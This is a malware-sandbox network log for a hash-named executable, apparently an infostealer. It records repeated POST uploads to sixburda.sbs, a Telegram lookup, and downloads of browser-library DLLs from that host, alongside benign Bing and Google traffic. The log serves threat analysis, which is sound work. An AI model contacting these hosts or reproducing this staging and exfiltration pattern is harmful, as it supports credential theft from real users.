                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOPwzrYT5wc%2BKQVaMll1BtzuHESKrf5sl6sauJHf8SVPxuvVszNCTDp%2FBUITxE79YV5TDi1GIAD4FDPBgzy32kZHUj%2FZ4Kr2gck1SzeSp7wPOi7q8Nbo9e0bO1tan2Y%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db93145a8bccd9a-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20989&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=686&delivery_rate=65717&cwnd=250&unsent_bytes=0&cid=51ff6e51c426290b&ts=82&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 1025
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8%2F9p9GbnWZYUS16Ytip1h%2BJrZ22ez67fX7Oq3%2BJ6Gz%2FrHSxwMO4jmaNx4U0i5Qo3VIfe9quIGmv%2BTkE4LinLtptmzv7g5JFt7nI8rRNMJlz9MEw6dvIZ%2BwvQJzxW2k%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931491bc76543-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=21088&sent=3&recv=7&lost=0&retrans=0&sent_bytes=115&recv_bytes=1825&delivery_rate=61963&cwnd=250&unsent_bytes=0&cid=2be86ef59f6cb11a&ts=678&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJ
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9NEnAKH3buUfEQ7uQnuYQLFYJHRqLv%2F3itA0Vgm%2BryXHMjXRLG5OscQMLrJvalrkyIn3rMQvO5U0qu21490JQpPWExmaKsjv0tv6F21dLK%2BSTnNXc59W2P2wgLxkN%2FU%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9314e7d7693db-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20824&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66643&cwnd=250&unsent_bytes=0&cid=90c40b3ee42e6f94&ts=414&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeJwmFLxm0i1fSAMDIltJ4QL%2ByzJu%2BPSCBNRjzkJQyBd%2FgFcmH3DVMvfx8BjjfXR4Ad3e8p9%2F%2BujEjNu0lCivqmHB4khp06v2IoeoRtgm8ABtNkpL37BfpsT6%2FZSNIQ%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931515ec14142-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=23116&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=65384&cwnd=250&unsent_bytes=0&cid=b9133ecb37e449fc&ts=441&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 461
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKmKiS7FmaGWb87hb5Y72jmOFojZe0%2FOVZarlVI7P5HDcIiYhkTie%2F0y5a%2BmBQtulRCn8jILM%2B0c0MkmaBZLVPkSppLZFtUioKZBnhVJju%2BuJtvZMz9pik5fvWOGYio%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db93154be6279c0-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20477&sent=4&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1231&delivery_rate=62809&cwnd=250&unsent_bytes=0&cid=f8b88d4588d3570a&ts=443&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 107941
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9lgex8nM3NK9%2BnEd9w%2Bim%2Fl76G0uSwK%2B5uHdiFqGscDfsy5knBye7rpd2jfbf%2Fjc3Mjfrsk5Xfz6tTT8EW5SbV38CAeMn029vq%2BMFY6fAnRg%2FJSf9S6dfYfdWfJs6Q%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9315849e1657c-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=22863&sent=38&recv=87&lost=0&retrans=0&sent_bytes=115&recv_bytes=108917&delivery_rate=65679&cwnd=242&unsent_bytes=0&cid=98c12f8332bfbdc8&ts=1043&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FQlhmnxpoxtf%2FpoEHlr1%2FCIUZI54J%2FyGgSmKv%2FVIzSJkHBUNceP6pYpjhEr3WKWISVFXOYr5hbeh%2BC0gF0znHkKC7N45O3jj0%2BuuFaIWrfT2rtZzD4aZUqin%2F87kek%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9315f093271a5-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20861&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66807&cwnd=250&unsent_bytes=0&cid=3fcb4f78b0477ee9&ts=444&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3x5ZycKKk5n7M4R9%2F4tiEo5hspTOaLLxWbj32gQsL%2BNFigaSc8HfwaCScoHE5RVpQHcTiqTI%2BAIfisn6Tu6jvoW6J%2FvIgKq5G1zk0raM3QYNnBcVkjS70QLMVcjVDQ%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931621b47bd98-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20496&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=65915&cwnd=250&unsent_bytes=0&cid=4e0e5aa2432f0bd4&ts=422&x=0"
                          • flag-us
                            DNS
                            56.163.245.4.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            56.163.245.4.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            206.23.85.13.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            206.23.85.13.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            67.209.201.84.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            67.209.201.84.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            57.169.31.20.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            57.169.31.20.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            48.229.111.52.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            48.229.111.52.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            43.58.199.20.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            43.58.199.20.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            tse1.mm.bing.net
                            Remote address:
                            8.8.8.8:53
                            Request
                            tse1.mm.bing.net
                            IN A
                            Response
                            tse1.mm.bing.net
                            IN CNAME
                            mm-mm.bing.net.trafficmanager.net
                            mm-mm.bing.net.trafficmanager.net
                            IN CNAME
                            ax-0001.ax-msedge.net
                            ax-0001.ax-msedge.net
                            IN A
                            150.171.27.10
                            ax-0001.ax-msedge.net
                            IN A
                            150.171.28.10
                          • flag-us
                            GET
                            https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                            host: tse1.mm.bing.net
                            accept: */*
                            accept-encoding: gzip, deflate, br
                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                            Response
                            HTTP/2.0 200
                            cache-control: public, max-age=2592000
                            content-length: 737521
                            content-type: image/jpeg
                            x-cache: TCP_HIT
                            access-control-allow-origin: *
                            access-control-allow-headers: *
                            access-control-allow-methods: GET, POST, OPTIONS
                            timing-allow-origin: *
                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: 8F835E8276C2400895207465D3070433 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
                            date: Fri, 01 Nov 2024 04:39:16 GMT
                          • flag-us
                            GET
                            https://tse1.mm.bing.net/th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                            host: tse1.mm.bing.net
                            accept: */*
                            accept-encoding: gzip, deflate, br
                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                            Response
                            HTTP/2.0 200
                            cache-control: public, max-age=2592000
                            content-length: 707128
                            content-type: image/jpeg
                            x-cache: TCP_HIT
                            access-control-allow-origin: *
                            access-control-allow-headers: *
                            access-control-allow-methods: GET, POST, OPTIONS
                            timing-allow-origin: *
                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: 2416DAE0DA7F4BA3B0BAB74E76941383 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
                            date: Fri, 01 Nov 2024 04:39:16 GMT
                          • flag-us
                            GET
                            https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                            host: tse1.mm.bing.net
                            accept: */*
                            accept-encoding: gzip, deflate, br
                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                            Response
                            HTTP/2.0 200
                            cache-control: public, max-age=2592000
                            content-length: 680644
                            content-type: image/jpeg
                            x-cache: TCP_HIT
                            access-control-allow-origin: *
                            access-control-allow-headers: *
                            access-control-allow-methods: GET, POST, OPTIONS
                            timing-allow-origin: *
                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: 336FAB3D2771424AB6F42265C09AE5BA Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
                            date: Fri, 01 Nov 2024 04:39:16 GMT
                          • flag-us
                            GET
                            https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                            host: tse1.mm.bing.net
                            accept: */*
                            accept-encoding: gzip, deflate, br
                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                            Response
                            HTTP/2.0 200
                            cache-control: public, max-age=2592000
                            content-length: 563032
                            content-type: image/jpeg
                            x-cache: TCP_HIT
                            access-control-allow-origin: *
                            access-control-allow-headers: *
                            access-control-allow-methods: GET, POST, OPTIONS
                            timing-allow-origin: *
                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: D946E51165A5496C8E7C9D1C92864B93 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
                            date: Fri, 01 Nov 2024 04:39:16 GMT
                          • 150.171.27.10:443
                            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=
                            tls, http2
                            2.0kB
                            9.4kB
                            22
                            19

                            HTTP Request

                            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

                            HTTP Response

                            204

                            HTTP Request

                            GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

                            HTTP Response

                            204

                            HTTP Request

                            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

                            HTTP Response

                            204
                          • 149.154.167.99:443
                            https://t.me/asg7rd
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.5kB
                            19.4kB
                            24
                            20

                            HTTP Request

                            GET https://t.me/asg7rd

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.1kB
                            4.5kB
                            12
                            9

                            HTTP Request

                            GET https://sixburda.sbs/

                            HTTP Response

                            200
                          • 142.250.187.227:80
                            http://c.pki.goog/r/r4.crl
                            http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            556 B
                            3.8kB
                            7
                            5

                            HTTP Request

                            GET http://c.pki.goog/r/gsr1.crl

                            HTTP Response

                            200

                            HTTP Request

                            GET http://c.pki.goog/r/r4.crl

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.5kB
                            1.3kB
                            10
                            7

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.6kB
                            2.8kB
                            11
                            8

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.8kB
                            7.2kB
                            15
                            12

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.6kB
                            1.3kB
                            10
                            7

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            6.3kB
                            1.3kB
                            14
                            8

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/sqlo.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            100.8kB
                            2.5MB
                            1926
                            1921

                            HTTP Request

                            GET https://sixburda.sbs/sqlo.dll

                            HTTP Response

                            200
                          • 142.250.180.4:443
                            www.google.com
                            tls
                            chrome.exe
                            907 B
                            4.6kB
                            7
                            7
                          • 216.58.213.10:443
                            ogads-pa.googleapis.com
                            tls, http2
                            chrome.exe
                            979 B
                            5.9kB
                            8
                            7
                          • 216.58.204.78:443
                            clients2.google.com
                            tls, http2
                            chrome.exe
                            975 B
                            8.0kB
                            8
                            8
                          • 127.0.0.1:9223
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            2.4kB
                            1.3kB
                            11
                            9

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 127.0.0.1:9223
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.7kB
                            1.2kB
                            10
                            7

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.7kB
                            1.2kB
                            10
                            7

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/freebl3.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            29.0kB
                            715.2kB
                            616
                            614

                            HTTP Request

                            GET https://sixburda.sbs/freebl3.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/mozglue.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            25.9kB
                            634.0kB
                            533
                            530

                            HTTP Request

                            GET https://sixburda.sbs/mozglue.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/msvcp140.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            20.2kB
                            471.1kB
                            424
                            421

                            HTTP Request

                            GET https://sixburda.sbs/msvcp140.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/softokn3.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            13.1kB
                            272.4kB
                            269
                            266

                            HTTP Request

                            GET https://sixburda.sbs/softokn3.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/vcruntime140.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            5.5kB
                            87.5kB
                            104
                            101

                            HTTP Request

                            GET https://sixburda.sbs/vcruntime140.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/nss3.dll
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            99.6kB
                            2.2MB
                            1675
                            1671

                            HTTP Request

                            GET https://sixburda.sbs/nss3.dll

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            2.3kB
                            1.2kB
                            11
                            7

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.7kB
                            3.6kB
                            13
                            10

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.6kB
                            2.8kB
                            11
                            8

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.7kB
                            1.3kB
                            10
                            8

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            112.6kB
                            2.7kB
                            91
                            42

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
